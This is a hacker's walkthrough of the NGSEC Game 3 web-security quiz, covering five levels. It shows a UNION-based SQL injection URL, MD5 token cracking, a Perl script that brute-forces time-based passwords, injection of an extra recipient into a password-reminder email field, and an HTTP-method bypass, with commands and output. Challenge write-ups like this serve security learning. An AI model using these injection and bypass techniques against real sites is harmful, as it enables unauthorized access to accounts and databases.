Level 1: --------------------------------------- NOTE: * This is not so easy as leve 1 from the previous games * URL: http://quiz.ngsec.com/game3/level1/index.php View the Source of the page, in the form note 3 things, [...] [...] [...] Look at the javascript Source for the form: http://quiz.ngsec.com/game3/level1/ajax.js Submiting the form you'll see the URL and args. http://quiz.ngsec.com/game3/level1/ajax_auth_ver3.php?login=bla&password=bla&token=uWRMEAXs5TxWPDAuEBmLDeAg3bCHGl7B&token2=c4ca4238a0b923820dcc509a6f75849b&level=1 Note the filename: "ajax_auth_ver3.php" Looking for other versions of the file, the following also exsist ajax_auth_ver1.php ajax_auth_ver2.php This level your going at things blind, so, ya have to gather as much info as you possibly can. 1: Reloading the page, token2 stays the same and token will always change. 2: They are md5 hashes. since token2 stayed the same, decided to try and crack it: (ngHashCrack) D:\>ngHashCrack --incremental --md5 --hash c4ca4238a0b923820dcc509a6f75849b ngHashCrack v1.0 by NGSEC Research Team FREEWARE hash cracker Next Generation Security Technologies http://www.ngsec.com Mode: Incremental Algorithm: MD5 Hash: c4ca4238a0b923820dcc509a6f75849b + Checking words of 1 bytes... Hash cracked with word: "1" Hexadecimal Notation: "31" D:\> The cracked Hash is the same as the Level arg "level=1" Checking for "Input Validation" on ajax_auth_ver1.php (probubly less secure)... 1: SQL Injection Input: http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login='&password='&token='&token2='&level=' Returns: Query String Tampered! Narrowed Down to..... http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=c4ca4238a0b923820dcc509a6f75849b&level=1 Returns: Error: invalid credentials. Since the md5 hash is the same as the level, getting the md5 hash of "bla" and passing the same for "level" (level=bla) I get, token2=128ecf542a35ac5270a87dc740918404 level=bla http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=128ecf542a35ac5270a87dc740918404&level=bla Returns: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/ngsec/webs/quiz/game3/level1/ajax_auth_ver1.php on line 16 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ngsec/webs/quiz/game3/level1/ajax_auth_ver1.php on line 17 Error: SQL error. Based on the provided error we know that we are getting to the database and its a MySql, and it's not getting a any results back so, we can assume the code is probubly looks something like.. [...] $sql = "select user, pass from table where level = $level" $result = mysql_query($sql); $number = mysql_num_rows($result); if($row = mysql_fetch_row($result)) { $user = $row[0] $pass = $row[1] } [...] if($login == $username && $pass == $password) { //Authentication PASSED } else { ////Authentication FAILED } To verify that the SQL Query wants a int rather than a varchar, using, (token2 == md5 hash for '2') and (level=2) http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?token2=c81e728d9d4c2f636f067f89cc14862c&level=2 Returns... Error: invalid credentials. At this point the key to passing this level is by way of SQL Injection. A Sql statement like... $sql = "select user, pass from table where level = 0 union select char(98,108,97), char(98,108,97)" should result in the database returning a non exsistent level but, $user == "bla" and $pass == "bla" and authentication should succeed, but it doesn't, got the same Error (Error: SQL error.) :/ After Much fiddling... SOLVE: level = 0 union select char(98,108,97) login = bla password = bla token2 = 1c7c2cd06644e275c0970f323d1f59b3 (md5 hash for "0 union select char(98,108,97)") token = khr7d3QMcMFc8Sm27mxLVRzAD85DspMq (Seesion token, dunno what this actually is and didn't take the time to crack it) URL: http://quiz.ngsec.com/game3/level1/ajax_auth_ver1.php?login=bla&password=bla&token=khr7d3QMcMFc8Sm27mxLVRzAD85DspMq&token2=1c7c2cd06644e275c0970f323d1f59b3&level=0%20union%20select%20char(98,108,97) Congratulations please continue the login process here So, Resulting psudo code turned out to be something like this... //Check for passed vars for valid input... //PHP magic quotes ?? or htmlspecialchars() ?? [...] //Get Username $sql = "select user from table where level = $level" $result = mysql_query($sql); $number = mysql_num_rows($result); if($row = mysql_fetch_row($result)) { $user = $row[0] } [...] //Get Password $sql = "select pass from table where level = $level" $result = mysql_query($sql); $number = mysql_num_rows($result); if($row = mysql_fetch_row($result)) { $pass = $row[0] } [...] if($login == $username && $pass == $password) { //Authentication PASSED } else { ////Authentication FAILED } Level 2: --------------------------------------- URL: http://quiz.ngsec.com/game3/level2/Zelda.php Using the Hints provided, my first guess was client/server date/time sync. Fisrt Had to set my local clock to the correct date/time [nocon > ntpdate time-b.nist.gov 4 Sep 01:48:08 ntpdate[2496]: step time server 129.6.15.29 offset -18989.888691 sec [nocon > date Tue Sep 4 01:48:10 CDT 2007 [nocon > Next Had to see what the date/time was being sent/recived [nocon-Micro-dev]:[2:04am] > date ; ./level2.pl ; date Tue Sep 4 02:04:37 CDT 2007 Date: Tue, 04 Sep 2007 07:04:40 GMT Client-Date: Tue, 04 Sep 2007 07:04:48 GMT Password should had been: 0ed62d9dd3b675d1d0f6d4d78dc9024d Tue Sep 4 02:04:48 CDT 2007 [nocon-Micro-dev]:[2:04am] > Connection delay vary's :( [nocon-Micro-dev]:[2:05am] > date ; ./level2.pl ; date Tue Sep 4 02:06:16 CDT 2007 Date: Tue, 04 Sep 2007 07:06:19 GMT Client-Date: Tue, 04 Sep 2007 07:06:32 GMT Password should had been: 9d685ca520bc820da6a581141b841152 Tue Sep 4 02:06:32 CDT 2007 [nocon-Micro-dev]:[2:06am] > Looks like i have anywhere between 8s to 14s delay :( Script(s): hashcheck.pl ========================================================================= #!/usr/bin/perl # use Digest::MD5 qw(md5 md5_hex md5_base64); $CheckHash = '7df4b36cdb6960e2870921e986954189'; $StartTime = '1188961004'; $EndTime = '1188961018'; $i= 0; while ($StartTime <= $EndTime) { $NewHash = md5_hex($StartTime); if($CheckHash eq $NewHash) { print "\nHash Found!\n"; print "Delay: ".$i."\n"; print $StartTime." - ".$NewHash."\n"; exit; } $i++; $StartTime++; } exit; --------------------------------------------------------- [nocon] > ./hashcheck.pl Hash Found! Delay: 4 1188961008 - 7df4b36cdb6960e2870921e986954189 [nocon] > level2.pl ========================================================================== #!/usr/bin/perl # use LWP::UserAgent; use HTML::Parse; use Digest::MD5 qw(md5 md5_hex md5_base64); while(1) { #Date in unix format + 11sec delay (need a faster connection, heh) $EpochTime = time; $EpochTime += 11; $PasswdHash = md5_hex($EpochTime); my $URL; $URL .= 'http://quiz.ngsec.com/game3/level2/validate_Zelda.php?'; $URL .= 'token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa'; $URL .= '&'; $URL .= 'token2=c81e728d9d4c2f636f067f89cc14862c'; $URL .= '&'; $URL .= 'level=2'; $URL .= '&'; $URL .= 'login=Admin'; $URL .= '&'; $URL .= 'password='.$PasswdHash; print $URL."\n"; #User Agent my $UserAgent = new LWP::UserAgent; $UserAgent->timeout(15); $UserAgent->agent('Mozilla/5.5 (compatible; MSIE 5.5; Windows NT 5.1)'); #Make The Request my $Request = HTTP::Request->new('GET'); $Request->url($URL); my $Response = $UserAgent->request($Request); #Response Headers my @Headers = split(/\n/,$Response->headers_as_string); #print $Headers."\n\n"; foreach $Line (@Headers) { if($Line =~ m/Date:/) { print $Line."\n"; } } #HTML Body my @HTML = split(/\n/,$Response->content); foreach $line (@HTML) { if($line =~ m/Password should had been/) { print $line."\n"; } elsif($line =~ m/Congratulations/i || $line =~ m/CONGRATULATIONS/i) { print $line."\n"; foreach $out (@HTML) { print $out."\n"; } exit; } } } exit; ================================================================================================== [nocon] > ./level2.pl http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login= Admin&password=bdc735a8b50a53f34c28b1df721ff6b7 Date: Wed, 05 Sep 2007 17:15:04 GMT Client-Date: Wed, 05 Sep 2007 17:15:09 GMT

Invalid Password, please synchronize your token generator.
Password should had been: e0cc44d0ec5e78acccecc78179c3e849

http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login= Admin&password=ee25e27977a615850bfcaa5c64abb412 Date: Wed, 05 Sep 2007 17:15:13 GMT Client-Date: Wed, 05 Sep 2007 17:15:20 GMT

Invalid Password, please synchronize your token generator.
Password should had been: d5b8293fc991f83b9a2e5a20c88564b9

http://quiz.ngsec.com/game3/level2/validate_Zelda.php?token=2GWpLAkdmJyYMhYFf9UnK2HdjXjenTWa&token2=c81e728d9d4c2f636f067f89cc14862c&level=2&login= Admin&password=a016a6d13dcd6b37467b160d430e1449 Date: Wed, 05 Sep 2007 17:15:21 GMT Client-Date: Wed, 05 Sep 2007 17:15:31 GMT

CONGRATULATIONS!!! Authentication Completed!

[....]
Level 2 Completed!

CONGRATULATIONS!!! Authentication Completed!

At this point you should update your score filling this form.

Not yet registered? Follow this link: Registration Form

Nickname
Password
[....] [nocon] > Level 3: ------------------------------------------- URL: http://quiz.ngsec.com/game3/level3/Snake_Eater.php Jesus, this level is too fukin easy The password reminder form sends an e-mail with username and password, so...... http://quiz.ngsec.com/game3/level3/admin/ admin@ngsec.com;your_email@domain.whatever ( note the ";") Weeeeeee Level 4: -------------------------------------------- URL: http://quiz.ngsec.com/game3/level4/Tyrell_Corporation.php http://quiz.ngsec.com/game3/level4/TODO Hint: "Level Under Construction. Developer read TODO list" Cord SRC File: Weeeeeeeee.... http://quiz.ngsec.com/game3/level4/CHANGELOG http://quiz.ngsec.com/game3/level4/level4_coordinates.txt SOLVE: http://quiz.ngsec.com/game3/level4/ajax_coord.php?login=Admin&password=NGSEC&coord1=E&coord2=4&c_value=dace&token=7ZHnCsFgxxXR7beHv4nlzXsAx4qx5EXs&token2=a87ff679a2f3e71d9181a67b7542122c&level=4 Bad Credentials! Fuckers!! Arrays start with zero, not in this case http://quiz.ngsec.com/game3/level4/ajax_coord.php?login=Admin&password=NGSEC&coord1=E&coord2=5&c_value=dace&token=7ZHnCsFgxxXR7beHv4nlzXsAx4qx5EXs&token2=a87ff679a2f3e71d9181a67b7542122c&level=4 Congratulations please continue the login process here Level 5: -------------------------------------------- URL: http://quiz.ngsec.com/game3/level5/Manjushri.php Solve: [nocon] > cat level5.pl #!/usr/bin/perl # # http://www.xav.com/perl/site/lib/lwpcook.html # # http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=97 # use LWP::UserAgent; $ua = LWP::UserAgent->new; $ua->agent("Mozilla/8.0"); # pretend we are very capable browser $req = HTTP::Request->new(Post => 'http://quiz.ngsec.com/game3/level5/Manjushri.php'); $req->header('Accept' => 'text/html'); # send request $res = $ua->request($req); # check the outcome if ($res->is_success) { print $res->decoded_content; } else { print "Error: " . $res->status_line . "\n"; } exit; [nocon] > ./level5.pl [....]
Level 5 Completed!

CONGRATULATIONS!!! Authentication Completed!

At this point you should update your score filling this form.

Not yet registered? Follow this link: Registration Form

Nickname
Password
[....]